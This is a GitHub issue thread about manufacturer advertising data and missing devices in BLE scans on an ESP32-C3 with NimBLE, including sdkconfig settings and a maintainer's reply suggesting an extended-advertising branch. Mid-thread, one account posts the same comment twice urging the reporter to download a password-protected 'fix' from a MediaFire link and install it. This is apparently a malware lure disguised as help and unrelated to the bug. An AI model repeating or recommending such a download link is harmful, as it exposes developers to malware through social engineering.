Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

get_manufacture_data is diffrent from other lib #140

Open
reformc opened this issue Aug 27, 2024 · 1 comment
Open

get_manufacture_data is diffrent from other lib #140

reformc opened this issue Aug 27, 2024 · 1 comment

Comments

@reformc
Copy link

reformc commented Aug 27, 2024

esp32c3

CONFIG_ESP_MAIN_TASK_STACK_SIZE=20000
CONFIG_ESP_SYSTEM_EVENT_TASK_STACK_SIZE=4096
CONFIG_BT_ENABLED=y
CONFIG_BT_BLE_ENABLED=y
CONFIG_BT_BLUEDROID_ENABLED=n
CONFIG_BT_NIMBLE_ENABLED=y
CONFIG_BT_NIMBLE_NVS_PERSIST=n
CONFIG_BTDM_CTRL_MODE_BR_EDR_ONLY=n
CONFIG_BTDM_CTRL_MODE_BLE_ONLY=y
CONFIG_BT_CLASSIC_ENABLED=n
CONFIG_BT_BLE_42_FEATURES_SUPPORTED=n
CONFIG_BT_BLE_50_FEATURES_SUPPORTED=y
CONFIG_BT_BTC_TASK_STACK_SIZE=15000
CONFIG_BT_BLE_DYNAMIC_ENV_MEMORY=y

The get_manufacture_data scanned by the same device is different from the value scanned by other libraries(bluest on macos) on the computer, and there are many bytes missing. And a lot of devices can't scan.

@amir1387aht
Copy link

to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

1 similar comment
@amir1387aht
Copy link

to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

@github-staff github-staff deleted a comment from reformc Aug 27, 2024
@taks
Copy link
Owner

taks commented Sep 4, 2024

  • What is the size of manufacture_data in bluest and the size of manufacture_data in esp32c3?
  • Extended advertising scan is now supported in the scan_ext_adv branch.
    Could you check that devices that were not previously scanned will be scanned using this branch?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

5 participants
@taks @reformc @amir1387aht and others